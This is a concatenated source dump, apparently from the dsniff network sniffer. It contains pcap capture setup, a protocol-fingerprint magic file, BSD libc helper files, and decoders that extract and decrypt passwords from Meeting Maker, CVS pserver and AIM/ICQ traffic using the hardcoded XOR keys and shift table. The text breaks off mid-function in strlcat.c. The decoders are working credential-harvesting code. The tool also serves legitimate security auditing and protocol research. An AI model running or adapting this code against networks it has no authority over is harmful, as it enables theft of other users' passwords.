| #define buf_size(b) ((b)->size) 41 | 42 | /* Return offset in buffer. */ 43 | #define buf_tell(b) ((b)->offset) 44 | 45 | /* Reposition buffer offset. */ 46 | int buf_seek(buf_t buf, int offset, int whence); 47 | #define buf_skip(b, l) buf_seek(b, l, SEEK_CUR) 48 | #define buf_rewind(b) buf_seek(b, 0, SEEK_SET) 49 | 50 | /* Read from buffer. */ 51 | int buf_get(buf_t buf, void *dst, int len); 52 | 53 | /* Write to buffer. */ 54 | int buf_put(buf_t buf, void *src, int len); 55 | int buf_putf(buf_t buf, const char *fmt, ...); 56 | 57 | /* Finalize buffer. */ 58 | void buf_end(buf_t buf); 59 | 60 | /* Locate byte string in buffer. */ 61 | int buf_index(buf_t buf, void *ptr, int len); 62 | int buf_rindex(buf_t buf, void *ptr, int len); 63 | 64 | /* Compare buffer to byte string. */ 65 | int buf_cmp(buf_t buf, void *ptr, int len); 66 | 67 | /* Tokenize buffer, like strtok(3). */ 68 | buf_t buf_tok(buf_t buf, void *sep, int len); 69 | 70 | /* Get a sub-buffer from buffer. */ 71 | buf_t buf_getbuf(buf_t buf, int offset, int len); 72 | 73 | /* Get a word from buffer. */ 74 | buf_t buf_getword(buf_t buf, void *sep, int len); 75 | 76 | /* Convert buffer to allocated string. */ 77 | char * buf_strdup(buf_t buf); 78 | 79 | /* ASCII string test. */ 80 | int buf_isascii(buf_t buf); 81 | 82 | #endif /* BUF_H */ 83 | -------------------------------------------------------------------------------- /decode_mmxp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_mmxp.c 3 | * 4 | * Meeting Maker. 5 | * 6 | * Thanks for Matt Power for his BUGTRAQ post 7 | * on Meeting Maker encryption, and for providing me with traffic traces. 8 | * 9 | * The encryption algorithm seems to be much simpler than what Matt 10 | * reversed - see below... 11 | * 12 | * Copyright (c) 2000 Dug Song 13 | * 14 | * $Id: decode_mmxp.c,v 1.8 2001/03/15 08:33:01 dugsong Exp $ 15 | */ 16 | 17 | #include "config.h" 18 | 19 | #include 20 | #include 21 | 22 | #include 23 | #include 24 | 25 | #include "buf.h" 26 | #include "decode.h" 27 | 28 | #define MM_SECRET "Thisisastupidwasteoftimeandspace" 29 | 30 | static u_char *mm_xor = MM_SECRET; 31 | 32 | int 33 | decode_mmxp(u_char *buf, int len, u_char *obuf, int olen) 34 | { 35 | struct buf inbuf, outbuf; 36 | u_char *p, c; 37 | u_int32_t i; 38 | int encrypt; 39 | 40 | buf_init(&inbuf, buf, len); 41 | buf_init(&outbuf, obuf, len); 42 | 43 | while ((i = buf_index(&inbuf, "\x00\x00\x24\x55", 4)) != -1) { 44 | buf_skip(&inbuf, i + 4); 45 | 46 | if (buf_cmp(&inbuf, "\x7f\xff", 2) == 0) 47 | encrypt = 1; 48 | else if (buf_cmp(&inbuf, "\xff\xff", 2) == 0) 49 | encrypt = 0; 50 | else continue; 51 | 52 | buf_skip(&inbuf, 4); 53 | 54 | /* LPPPg? */ 55 | if (buf_get(&inbuf, &i, sizeof(i)) < 0) 56 | break; 57 | 58 | i = ntohl(i); 59 | if (buf_skip(&inbuf, i + 4 + 4) < 0) 60 | continue; 61 | 62 | /* Server. */ 63 | if (buf_get(&inbuf, &c, 1) != 1) break; 64 | if (buf_len(&inbuf) < c) break; 65 | 66 | buf_put(&outbuf, buf_ptr(&inbuf), c); 67 | buf_put(&outbuf, "\n", 1); 68 | buf_skip(&inbuf, c + 4); 69 | 70 | /* Username. */ 71 | if (buf_get(&inbuf, &c, 1) != 1) break; 72 | if (buf_len(&inbuf) < c) break; 73 | 74 | buf_put(&outbuf, buf_ptr(&inbuf), c); 75 | buf_put(&outbuf, "\n", 1); 76 | buf_skip(&inbuf, c + 4); 77 | 78 | /* Password. */ 79 | if (buf_get(&inbuf, &c, 1) != 1) break; 80 | if (buf_len(&inbuf) < c) break; 81 | 82 | p = buf_ptr(&inbuf); 83 | 84 | if (encrypt) { 85 | for (i = 0; i < c; i++) 86 | p[i] ^= mm_xor[i % (sizeof(MM_SECRET) - 1)]; 87 | } 88 | buf_put(&outbuf, p, c); 89 | buf_put(&outbuf, "\n", 1); 90 | } 91 | buf_end(&outbuf); 92 | 93 | return (buf_len(&outbuf)); 94 | } 95 | 96 | -------------------------------------------------------------------------------- /missing/err.h: -------------------------------------------------------------------------------- 1 | /* 2 | * err.h 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1993 9 | * The Regents of the University of California. All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. All advertising materials mentioning features or use of this software 20 | * must display the following acknowledgement: 21 | * This product includes software developed by the University of 22 | * California, Berkeley and its contributors. 23 | * 4. Neither the name of the University nor the names of its contributors 24 | * may be used to endorse or promote products derived from this software 25 | * without specific prior written permission. 26 | * 27 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 28 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 29 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 30 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 31 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 32 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 33 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 34 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 35 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 36 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 37 | * SUCH DAMAGE. 38 | * 39 | * @(#)err.h 8.1 (Berkeley) 6/2/93 40 | */ 41 | 42 | #ifndef _ERR_H_ 43 | #define _ERR_H_ 44 | 45 | void err(int eval, const char *fmt, ...); 46 | void warn(const char *fmt, ...); 47 | void errx(int eval, const char *fmt, ...); 48 | void warnx(const char *fmt, ...); 49 | 50 | #endif /* !_ERR_H_ */ 51 | -------------------------------------------------------------------------------- /decode_cvs.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_cvs.c 3 | * 4 | * Concurrent Versions System. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_cvs.c,v 1.6 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "buf.h" 18 | #include "decode.h" 19 | 20 | /* stolen from CVS scramble.c */ 21 | static u_char cvs_shifts[] = { 22 | 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 23 | 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 24 | 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 25 | 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 26 | 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 27 | 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 28 | 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 29 | 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 30 | 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 31 | 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 32 | 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 33 | 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 34 | 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 35 | 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 36 | 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 37 | 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 38 | }; 39 | 40 | int 41 | decode_cvs(u_char *buf, int len, u_char *obuf, int olen) 42 | { 43 | struct buf *line, inbuf, outbuf; 44 | u_char *p; 45 | int i, n; 46 | 47 | buf_init(&inbuf, buf, len); 48 | buf_init(&outbuf, obuf, olen); 49 | 50 | if (buf_cmp(&inbuf, "BEGIN ", 6) != 0) 51 | return (0); 52 | 53 | for (n = 0; n < 5 && (i = buf_index(&inbuf, "\n", 1)) != -1; n++) { 54 | line = buf_tok(&inbuf, NULL, i + 1); 55 | line->base[line->end - 1] = '\0'; 56 | 57 | p = buf_ptr(line); 58 | buf_putf(&outbuf, "%s", p); 59 | 60 | if (n == 3) { 61 | if (p[0] != 'A') 62 | return (0); 63 | 64 | for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) 65 | p[i] = cvs_shifts[p[i]]; 66 | 67 | buf_putf(&outbuf, " [%s]", p + 1); 68 | } 69 | buf_put(&outbuf, "\n", 1); 70 | } 71 | buf_end(&outbuf); 72 | 73 | return (buf_len(&outbuf)); 74 | } 75 | 76 | -------------------------------------------------------------------------------- /dsniff.magic: -------------------------------------------------------------------------------- 1 | # $Id: dsniff.magic,v 1.8 2000/07/19 03:22:02 dugsong Exp $ 2 | # 3 | # Network protocol magic(5) for dsniff. 4 | # 5 | 6 | 0 string FLAPON aim 7 | 8 | 0 string BEGIN\ cvs 9 | 10 | 0 string SYST ftp 11 | 0 string USER\ ftp ftp 12 | 0 string USER\ anonymous ftp 13 | 14 | 0 string HELO\ smtp 15 | 0 string EHLO\ smtp 16 | 17 | 0 string GET\ / http 18 | 0 string POST\ / http 19 | 0 string CONNECT\ http 20 | 21 | 1 string \ LOGIN\ imap 22 | 2 string \ LOGIN\ imap 23 | 3 string \ LOGIN\ imap 24 | 4 string \ LOGIN\ imap 25 | 5 string \ LOGIN\ imap 26 | 27 | 0 string NICK\ irc 28 | 29 | 0 string USER\ pop 30 | 0 string AUTH\ pop 31 | 32 | 12 string MIT-MAGIC x11 33 | 34 | 0 string LIST nntp 35 | 0 string GROUP nntp 36 | 0 string NEW nntp 37 | 0 string ARTICLE nntp 38 | 39 | 0 belong 0x7f7f4943 40 | >4 beshort 0x4100 citrix 41 | 42 | 0 belong 0x0200e803 icq 43 | 44 | 8 belong 0x0135012c 45 | >12 belong 0x0c010800 46 | >>16 belong 0x7fff7f08 47 | >>>20 belong 0x00000001 oracle 48 | 49 | 0 belong 0x0 50 | >4 byte 0x8d pcanywhere 51 | >5 byte 0x6 pcanywhere 52 | 53 | 132 belong 0x0301060a 54 | >242 belong 0 tds 55 | 32 belong 0xe0031000 56 | >36 belong 0x2c010000 tds 57 | 58 | 12 belong 100000 59 | >4 belong 0 60 | >>8 belong 2 portmap 61 | 12 belong 100005 62 | >4 belong 0 63 | >>8 belong 2 mountd 64 | 12 belong 100009 65 | >4 belong 0 66 | >>8 belong 2 yppasswd 67 | 68 | 16 belong 100000 69 | >8 belong 0 70 | >>12 belong 2 portmap 71 | 16 belong 100005 72 | >8 belong 0 73 | >>12 belong 2 mountd 74 | 16 belong 100009 75 | >8 belong 0 76 | >>12 belong 2 yppasswd 77 | 78 | 0 belong 296 79 | >4 belong 0x20000 postgresql 80 | 81 | 0 belong 0x81000048 82 | >33 string CACA smb 83 | 84 | 0 beshort >0xfff9 85 | >2 byte <40 86 | >>3 beshort >0xfff9 87 | >>>5 byte <40 telnet 88 | 89 | 2 leshort 2 90 | >(0.b+6) leshort 208 napster 91 | >(0.b+6) leshort 2 napster 92 | 93 | 0 byte 0x38 94 | >8 belong 0x00002455 mmxp 95 | 96 | 0 byte 5 97 | >6 leshort 260 98 | >>32 byte 0 sniffer 99 | >6 leshort 261 100 | >>32 lelong -1 sniffer 101 | >1 belong 0 102 | >>5 byte 0 icq 103 | >(1.b+1) byte 1 socks 104 | 105 | 0 byte&0x1f 16 106 | >2 byte&0x1f 2 107 | >>5 byte 0x60 ldap 108 | >4 byte&0x1f 2 109 | >>5 beshort&0xfffc 0x0100 110 | >>>7 byte&0x1f 4 snmp 111 | -------------------------------------------------------------------------------- /missing/memcmp.c: -------------------------------------------------------------------------------- 1 | /* $Id: memcmp.c,v 1.1 2000/11/29 13:57:46 dugsong Exp $ */ 2 | /*- 3 | * Copyright (c) 1990 The Regents of the University of California. 4 | * All rights reserved. 5 | * 6 | * This code is derived from software contributed to Berkeley by 7 | * Chris Torek. 8 | * 9 | * Redistribution and use in source and binary forms, with or without 10 | * modification, are permitted provided that the following conditions 11 | * are met: 12 | * 1. Redistributions of source code must retain the above copyright 13 | * notice, this list of conditions and the following disclaimer. 14 | * 2. Redistributions in binary form must reproduce the above copyright 15 | * notice, this list of conditions and the following disclaimer in the 16 | * documentation and/or other materials provided with the distribution. 17 | * 3. All advertising materials mentioning features or use of this software 18 | * must display the following acknowledgement: 19 | * This product includes software developed by the University of 20 | * California, Berkeley and its contributors. 21 | * 4. Neither the name of the University nor the names of its contributors 22 | * may be used to endorse or promote products derived from this software 23 | * without specific prior written permission. 24 | * 25 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 26 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 27 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 28 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 29 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 30 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 31 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 32 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 33 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 34 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 35 | * SUCH DAMAGE. 36 | */ 37 | 38 | #include 39 | 40 | /* 41 | * Compare memory regions. 42 | */ 43 | int 44 | memcmp(s1, s2, n) 45 | const void *s1, *s2; 46 | size_t n; 47 | { 48 | if (n != 0) { 49 | register const unsigned char *p1 = s1, *p2 = s2; 50 | 51 | do { 52 | if (*p1++ != *p2++) 53 | return (*--p1 - *--p2); 54 | } while (--n != 0); 55 | } 56 | return (0); 57 | } 58 | -------------------------------------------------------------------------------- /missing/strlcpy.c: -------------------------------------------------------------------------------- 1 | /* $Id: strlcpy.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #if defined(LIBC_SCCS) && !defined(lint) 32 | static char *rcsid = "$OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $"; 33 | #endif /* LIBC_SCCS and not lint */ 34 | 35 | #include 36 | #include 37 | 38 | /* 39 | * Copy src to string dst of size siz. At most siz-1 characters 40 | * will be copied. Always NUL terminates (unless siz == 0). 41 | * Returns strlen(src); if retval >= siz, truncation occurred. 42 | */ 43 | size_t strlcpy(dst, src, siz) 44 | char *dst; 45 | const char *src; 46 | size_t siz; 47 | { 48 | register char *d = dst; 49 | register const char *s = src; 50 | register size_t n = siz; 51 | 52 | if (n == 0) 53 | return(strlen(s)); 54 | while (*s != '\0') { 55 | if (n != 1) { 56 | *d++ = *s; 57 | n--; 58 | } 59 | s++; 60 | } 61 | *d = '\0'; 62 | 63 | return(s - src); /* count does not include NUL */ 64 | } 65 | -------------------------------------------------------------------------------- /pcaputil.c: -------------------------------------------------------------------------------- 1 | /* 2 | * pcaputil.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: pcaputil.c,v 1.2 2001/03/15 08:33:04 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #ifdef BSD 21 | #include 22 | #endif 23 | 24 | #include "pcaputil.h" 25 | 26 | #ifdef BSD 27 | static int 28 | bpf_immediate(int fd, int on) 29 | { 30 | return (ioctl(fd, BIOCIMMEDIATE, &on)); 31 | } 32 | #endif 33 | 34 | int 35 | pcap_dloff(pcap_t *pd) 36 | { 37 | int offset = -1; 38 | 39 | switch (pcap_datalink(pd)) { 40 | case DLT_EN10MB: 41 | offset = 14; 42 | break; 43 | case DLT_IEEE802: 44 | offset = 22; 45 | break; 46 | case DLT_FDDI: 47 | offset = 21; 48 | break; 49 | #ifdef DLT_LOOP 50 | case DLT_LOOP: 51 | #endif 52 | case DLT_NULL: 53 | offset = 4; 54 | break; 55 | default: 56 | warnx("unsupported datalink type"); 57 | break; 58 | } 59 | return (offset); 60 | } 61 | 62 | pcap_t * 63 | pcap_init(char *intf, char *filter, int snaplen) 64 | { 65 | pcap_t *pd; 66 | u_int net, mask; 67 | struct bpf_program fcode; 68 | char ebuf[PCAP_ERRBUF_SIZE]; 69 | 70 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) { 71 | warnx("%s", ebuf); 72 | return (NULL); 73 | } 74 | if ((pd = pcap_open_live(intf, snaplen, 1, 512, ebuf)) == NULL) { 75 | warnx("%s", ebuf); 76 | return (NULL); 77 | } 78 | if (pcap_lookupnet(intf, &net, &mask, ebuf) == -1) { 79 | warnx("%s", ebuf); 80 | return (NULL); 81 | } 82 | if (pcap_compile(pd, &fcode, filter, 1, mask) < 0) { 83 | pcap_perror(pd, "pcap_compile"); 84 | return (NULL); 85 | } 86 | if (pcap_setfilter(pd, &fcode) == -1) { 87 | pcap_perror(pd, "pcap_compile"); 88 | return (NULL); 89 | } 90 | #ifdef BSD 91 | if (bpf_immediate(pd->fd, 1) < 0) { 92 | perror("ioctl"); 93 | return (NULL); 94 | } 95 | #endif 96 | return (pd); 97 | } 98 | 99 | /* from tcpdump util.c. */ 100 | char * 101 | copy_argv(char **argv) 102 | { 103 | char **p, *buf, *src, *dst; 104 | u_int len = 0; 105 | 106 | p = argv; 107 | if (*p == 0) 108 | return (0); 109 | 110 | while (*p) 111 | len += strlen(*p++) + 1; 112 | 113 | if ((buf = (char *)malloc(len)) == NULL) 114 | err(1, "copy_argv: malloc"); 115 | 116 | p = argv; 117 | dst = buf; 118 | 119 | while ((src = *p++) != NULL) { 120 | while ((*dst++ = *src++) != '\0') 121 | ; 122 | dst[-1] = ' '; 123 | } 124 | dst[-1] = '\0'; 125 | 126 | return (buf); 127 | } 128 | -------------------------------------------------------------------------------- /decode_aim.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_aim.c 3 | * 4 | * AOL Instant Messenger (and ICQ2000). 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_aim.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "hex.h" 19 | #include "buf.h" 20 | #include "decode.h" 21 | 22 | struct flap { 23 | u_char start; 24 | u_char channel; 25 | u_short seqnum; 26 | u_short datalen; 27 | }; 28 | 29 | static char *aim_xor1 = "Tic/Toc"; 30 | 31 | static u_char aim_xor2[] = { 32 | 0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 33 | 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c 34 | }; 35 | 36 | int 37 | decode_aim(u_char *buf, int len, u_char *obuf, int olen) 38 | { 39 | struct buf *msg, inbuf, outbuf; 40 | struct flap *flap; 41 | u_char c, *p; 42 | int i, j; 43 | 44 | buf_init(&inbuf, buf, len); 45 | buf_init(&outbuf, obuf, olen); 46 | 47 | if (buf_cmp(&inbuf, "FLAPON\r\n\r\n", 10) == 0) 48 | buf_skip(&inbuf, 10); 49 | 50 | while (buf_len(&inbuf) > sizeof(*flap)) { 51 | flap = (struct flap *)buf_ptr(&inbuf); 52 | flap->datalen = ntohs(flap->datalen); 53 | 54 | i = sizeof(*flap) + flap->datalen; 55 | 56 | if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) 57 | break; 58 | 59 | buf_skip(msg, sizeof(*flap)); 60 | 61 | if (buf_cmp(msg, "toc_signon ", 11) == 0) { 62 | msg->base[msg->end - 1] = '\0'; 63 | p = buf_ptr(msg); 64 | 65 | for (i = 0; i < 4; i++) { 66 | if ((j = strcspn(p, " ")) > 0) 67 | p += (j + 1); 68 | } 69 | if (strtok(p, " ") == NULL) 70 | continue; 71 | 72 | buf_putf(&outbuf, "%s ", buf_ptr(msg)); 73 | 74 | i = strlen(p); 75 | j = hex_decode(p, i, p, i); 76 | 77 | for (i = 0; i < j; i++) 78 | p[i] = p[i] ^ aim_xor1[i % 7]; 79 | p[i] = '\0'; 80 | 81 | buf_putf(&outbuf, "[%s]\n", p); 82 | } 83 | else if (flap->start == 0x2a && flap->channel == 0x01 && 84 | buf_cmp(msg, "\x00\x00\x00\x01", 4) == 0) { 85 | buf_skip(msg, 7); 86 | 87 | buf_get(msg, &c, 1); 88 | p = buf_ptr(msg); 89 | 90 | if (c == 0 || buf_skip(msg, c + 3) < 0) 91 | continue; 92 | 93 | p[c] = '\0'; 94 | 95 | buf_get(msg, &c, 1); 96 | 97 | if (buf_len(msg) < c + 1) 98 | continue; 99 | 100 | buf_putf(&outbuf, "%s\n", p); 101 | 102 | p = buf_ptr(msg); 103 | 104 | for (i = 0; i < c; i++) { 105 | p[i] = p[i] ^ aim_xor2[i % sizeof(aim_xor2)]; 106 | } 107 | p[i] = '\0'; 108 | 109 | buf_putf(&outbuf, "%s\n", p); 110 | 111 | break; 112 | } 113 | } 114 | buf_end(&outbuf); 115 | 116 | return (buf_len(&outbuf)); 117 | } 118 | -------------------------------------------------------------------------------- /missing/dirname.c: -------------------------------------------------------------------------------- 1 | /* $Id: dirname.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: dirname.c,v 1.4 1999/05/30 17:10:30 espie Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1997 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #include 32 | #include 33 | #include 34 | 35 | char * 36 | dirname(path) 37 | const char *path; 38 | { 39 | static char bname[MAXPATHLEN]; 40 | register const char *endp; 41 | 42 | /* Empty or NULL string gets treated as "." */ 43 | if (path == NULL || *path == '\0') { 44 | (void)strcpy(bname, "."); 45 | return(bname); 46 | } 47 | 48 | /* Strip trailing slashes */ 49 | endp = path + strlen(path) - 1; 50 | while (endp > path && *endp == '/') 51 | endp--; 52 | 53 | /* Find the start of the dir */ 54 | while (endp > path && *endp != '/') 55 | endp--; 56 | 57 | /* Either the dir is "/" or there are no slashes */ 58 | if (endp == path) { 59 | (void)strcpy(bname, *endp == '/' ? "/" : "."); 60 | return(bname); 61 | } else { 62 | do { 63 | endp--; 64 | } while (endp > path && *endp == '/'); 65 | } 66 | 67 | if (endp - path + 1 > sizeof(bname)) { 68 | errno = ENAMETOOLONG; 69 | return(NULL); 70 | } 71 | (void)strncpy(bname, path, endp - path + 1); 72 | bname[endp - path + 1] = '\0'; 73 | return(bname); 74 | } 75 | -------------------------------------------------------------------------------- /missing/strlcat.c: -------------------------------------------------------------------------------- 1 | /* $Id: strlcat.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #if defined(LIBC_SCCS) && !defined(lint) 32 | static char *rcsid = "$OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $"; 33 | #endif /* LIBC_SCCS and not lint */ 34 | 35 | #include 36 | #include 37 | 38 | /* 39 | * Appends src to string dst of size siz (unlike strncat, siz is the 40 | * full size of dst, not space left). At most siz-1 characters 41 | * will be copied. Always NUL terminates (unless siz == 0). 42 | * Returns strlen(src); if retval >= siz, truncation occurred. 43 | */ 44 | size_t strlcat(dst, src, siz) 45 | char *dst; 46 | const char *src; 47 | size_t siz; 48 | { 49 | register char *d = dst; 50 | register const char *s = src; 51 | register size_t n = siz; 52 | size_t dlen; 53 | 54 | /* Find the end of dst and adjust bytes left */ 55 | while (*d != '\0' && n != 0) 56 | d++; 57 | dlen = d - dst; 58 | n 